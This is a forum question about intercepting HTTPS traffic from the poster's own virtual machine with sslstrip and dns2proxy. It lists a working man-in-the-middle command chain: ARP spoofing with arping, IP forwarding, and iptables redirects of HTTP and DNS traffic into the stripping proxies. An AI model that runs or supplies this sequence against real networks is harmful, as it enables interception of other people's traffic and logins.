# sslstrip2 + dns2proxy --> dnsalert

Tags: ssl

I am trying to intercept https traffic from my virtual machine.

I'm using sslstrip + dns2proxy to redirect https to http on the virtual machine. I have some problems :
It seems that dns2proxy is extremly slow or is not working properly (i'm not sure i've configured the .conf file how i am supposed to, because i didn't find much doc about it. I want it to spoof all domains, let's say facebook.com as example)
+ sslstrip isnt logging anything in its logfile.
Finaly, when i go to facebook.com on the victim computer, chrome throws a security alert (I guess it is linked to h2ts, but dns2proxy is supposed to avoid that), BUT NOT EVERYTIME, sometimes, it still redirects to https://facebook.com

Any help please ?

What i've done :

```
sysctl net.ipv4.ip_nonlocal_bind=1
echo 1 > /proc/sys/net/ipv4/ip_forward
arping  -U -s 192.168.1.2 -I eth0 192.168.1.1
arping  -U -s 192.168.1.1 -I eth0 192.168.1.2

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py (with .facebook.com 8.8.8.8 in the domains.conf)
sslstrip -l 9000 -a -w log_sslstrip.xt
```

EDIT :
I will give a try with MITMf
https://github.com/byt3bl33d3r/MITMf
Regards

Comment: This is not very related to programming. You may be more on topic instead on [su] or [sf].

Comment: Well, there were some post about this on SO so i gave it a try :)
But thanks, I'll try :)